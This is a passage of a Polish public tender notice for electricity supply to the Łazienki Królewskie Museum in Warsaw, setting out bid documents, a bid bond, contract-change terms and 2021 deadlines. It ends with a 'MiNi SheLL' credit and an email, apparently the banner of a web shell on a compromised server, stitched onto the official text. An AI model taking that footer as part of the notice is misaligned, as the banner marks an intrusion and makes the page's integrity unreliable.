Wykonawcę warunków udziału w postępowaniu Wykonawca składa następujące podmiotowe środki dowodowe: <br/>1)	wykaz dostaw wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie; przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert -– załącznik nr 4 do SWZ;<br/>2)	aktualnej koncesji na prowadzenie działalności gospodarczej w zakresie obrotu energią elektryczną wydana przez Prezesa Urzędu Regulacji Energetyki – Zamawiający dopuszcza wydruk ze strony https://bip.ure.gov.pl/bip/rejestry-i-bazy (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 5.	Do oferty należy dołączyć:<br/>1)	odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej lub innego właściwego rejestru – w celu potwierdzenia, <br/>że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania;<br/>2)	pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>3)	pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>4)	oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania oraz spełnienia warunków udziału w postępowaniu wzór oświadczenia stanowi Załącznik nr 3a i 3b <br/>do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia składa każdy z Wykonawców;<br/>5)	oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>o którym mowa w art. 117 ust. 4 ustawy PZP – wzór oświadczenia stanowi załącznik nr 7 <br/>do SWZ;<br/>6)	zobowiązanie podmiotu trzeciego do udostępnienia zasobów wzór oświadczenia stanowi załącznik nr 6 do SWZ, w przypadku gdy Wykonawca polega na zdolnościach podmiotów udostępniających zasoby w celu potwierdzenia spełnienia warunków udziału <br/>w postępowaniu wraz z pełnomocnictwem, jeżeli prawo do podpisania danego zobowiązania nie wynika z dokumentów KRS lub CEiDG. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości 6.000,00 PLN (słownie: sześć tysięcy złotych 00/100) przed upływem terminu składania ofert.<br/>2.	Wadium należy wnieść przed upływem terminu składania ofert.<br/>3.	Wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku następujących formach, o których mowa w art. 97 ust. 7 Ustawy PZP tj.:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy<br/> z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości <br/>(Dz. U. z 2020 r., poz. 229 ze zm.).<br/>4.	Wadium wnoszone w formie pieniądza należy wpłacić przelewem na rachunek bankowy w Banku BGK nr rachunku: 77 1130 1017 0020 1460 7690 0001 z dopiskiem na przelewie: „Wadium <br/>w postępowaniu na: „Dostawa energii elektrycznej do obiektów na terenie Muzeum Łazienki Królewskie w Warszawie (zadanie nr 1) wraz z usługą odbioru i rozliczenia energii elektrycznej wprowadzonej do sieci OSD z mikroinstalacji Zamawiającego (zadanie nr 2)”, znak sprawy: 17/2021/PZP”. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania <br/>i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone <br/>do oferty. UWAGA: treść pełnomocnictwa powinna dokładnie określać zakres umocowania oraz dane mocodawców i pełnomocnika. Pełnomocnictwo musi być złożone w oryginale (formie elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznym, lub postać elektroniczna opatrzona podpisem zaufanym lub podpisem osobistym) lub kopii poświadczonej notarialnie w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, <br/>o których mowa w Rozdziale XII ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia <br/>te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, <br/>z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni Wykonawcy.<br/>4.	Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający będzie mógł żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę Wykonawców. <br/>5.	Zamawiający zgodnie z art. 60 Ustawy PZP nie zastrzega obowiązku samodzielnego wykonania przez poszczególnych Wykonawców wspólnie ubiegających się o zamówienie kluczowych zadań. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zakazuje się zmian postanowień zawartej Umowy z zastrzeżeniem zmian przewidzianych <br/>w niniejszym paragrafie poniżej oraz zmian określonych w art. 455 ust. 1 pkt 2-4 oraz ust. 2 ustawy Pzp.<br/>2.	Zamawiający przewiduje i zastrzega sobie możliwość wprowadzenia zmian do treści Umowy <br/>w zakresie:<br/>1)	w zakresie wyeliminowania oczywistych omyłek pisarskich i rachunkowych, <br/>2)	w zakresie przedłużenia terminu obowiązywania Umowy w sytuacji, gdy do dnia upływu terminu wskazanego w § 6 ust.1 Umowy nie zostanie wyczerpana maksymalna wartość brutto Umowy, o której mowa w § 5 ust. 1 Umowy, o okres nie dłuższy niż dalsze 12 miesięcy, nie dłużej jednak niż do dnia wyczerpania maksymalnej wartości brutto Umowy; <br/>3)	w zakresie zmniejszenia liczby punktów poboru energii elektrycznej, o których mowa w OPZ stanowiącym załącznik nr __ do Umowy, w związku z likwidacją lub zamknięciem przez Zamawiającego obiektu lub części obiektu, w którym znajduje się dany punkt poboru, <br/>4)	w zakresie zwiększenia liczby punktów poboru energii elektrycznej, o których mowa w OPZ stanowiącym załącznik nr __ do Umowy, w przypadku nabycia lub najmu obiektu, bądź rozbudowy obecnej infrastruktury Zamawiającego powodującej zwiększenie liczby punktów poboru. Rozliczenie dodatkowych punktów poboru będzie się odbywało odpowiednio do pierwotnej części zamówienia i według tych samych stawek rozliczeniowych. Zwiększenie liczby punktów poboru możliwe jest jedynie w obrębie grup taryfowych, które zostały ujęte w SWZ oraz wycenione w Formularzu Ofertowym Wykonawcy. Warunkiem zmiany Umowy jest przedstawienie przez Zamawiającego odpowiedniego certyfikatu wydawanego przez OSD dla przyłączanego PPE; <br/>5)	w zakresie zmiany wielkości mocy przyłączeniowej lub mocy umownej, grupy taryfowej punktów poboru (także zmiany na grupę taryfową nie ujęta w niniejszej Umowie), <br/>w przypadku zaistnienia takiej potrzeby po stronie Zamawiającego wynikającej <br/>z prowadzonej przez niego działalności; <br/>6)	w zakresie wynikającym ze zmiany taryf Wykonawcy; <br/>7)	w zakresie zmiany wysokości wynagrodzenia określonego w § 5 ust. 1 Umowy w przypadku zmiany przepisów prawa powszechnie obowiązującego skutkujących zmianą podatku akcyzowego; <br/>8)	w zakresie zmniejszenia liczby Mikroinstalacji, o których mowa w § 3 ust. 6 Umowy, <br/>w przypadku zbycia, wynajmu, likwidacji lub zamknięcia przez Zamawiającego obiektu lub części obiektu, w którym znajduje się dany punkt poboru, bądź też w razie rozbiórki Mikroinstalacji; <br/>9)	w zakresie zwiększenia liczby Mikroinstalacji, o których mowa w § 3 ust. 6 Umowy, <br/>w przypadku wybudowania przez Zamawiającego nowych Mikroinstalacji; <br/>10)	w zakresie wynikającym ze zmiany na wniosek Zamawiającego grupy taryfowej dla poszczególnych PPE, w sytuacjach o których mowa w § 4 ust.8 Umowy; <br/>11)	w przypadku ograniczenia środków finansowych jakimi dysponuje Zamawiający - ograniczeniu ulegnie odpowiednio zakres rzeczowy Umowy i wynagrodzenie;<br/>12)	w przypadku zmiany sposobu realizacji zamówienia wynikającej ze zmian w obowiązujących przepisach prawa mających wpływ na realizację Przedmiotu Zamówienia, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć;<br/>13)	wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami;<br/>14)	wystąpienia okoliczności, których Strony umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności;<br/>15)	zmiana wynikająca z okoliczności związanych z wystąpieniem potwierdzonych przez odpowiednie służby sanitarne zakażeń COVID-19 ... <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-15 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://lazienki-krolewskie.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-15 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Oferta, wniosek o dopuszczenie do udziału w postępowaniu, oświadczenia, o których mowa w<br/>art. 125 ust. 1 Ustawy PZP, podmiotowe środki dowodowe (jeżeli były wymagane), w tym<br/>oświadczenie, o którym mowa art. 117 ust 4 Ustawy PZP, zobowiązanie podmiotu<br/>udostępniającego zasoby, przedmiotowe środki dowodowe (jeżeli były wymagane) oraz<br/>pełnomocnictwo sporządza się w postaci elektronicznej. Oferta, wniosek o dopuszczenie do<br/>udziału w postępowaniu, oświadczenia, o których mowa w art. 125 ust. 1 Ustawy PZP, składa<br/>się pod rygorem nieważności w formie elektronicznej (opatrzonej kwalifikowanym podpisem<br/>elektronicznym) lub postaci elektronicznej opatrzonej podpisem zaufany lub podpisem osobistym<br/>złożonym przez Wykonawcę bezpośrednio na dokumencie, który następnie przesyła do<br/>systemu.<br/>1. Wykonawca może, w celu potwierdzenia spełniania warunków udziału w niniejszym<br/>postępowaniu, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej<br/>lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego<br/>łączących go z nimi stosunków prawnych. 2. W odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na<br/>zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane<br/>lub usługi, do realizacji których te zdolności są wymagane. 3. Wykonawca, który polega na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu<br/>do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Wzór oświadczenia stanowi załącznik do<br/>SWZ.<br/>1. Wykonawca mający siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej<br/>Polskiej, zamiast:<br/>1) Informacji z Krajowego rejestru Karnego, o której mowa w Rozdz. XII ust. 7 pkt 3) SWZ<br/>powyżej – składa informację z odpowiedniego rejestru, takiego jak rejestr sądowy, albo, w<br/>przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ<br/>sądowy lub administracyjny kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,<br/>w zakresie, o którym mowa w Rozdz. XII ust. 7 pkt 3); 2) odpisu lub informacji z Krajowego<br/>Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej - składa<br/>dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego<br/>aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność<br/>gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>2. Dokument, o którym mowa w ust. 1 pkt 1) powyżej, powinien być wystawiony nie wcześniej niż 6 miesiące przed jego złożeniem. Dokument, o którym mowa w ust. 1 pkt 2) powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.

Creat By MiNi SheLL
Email: jattceo@gmail.com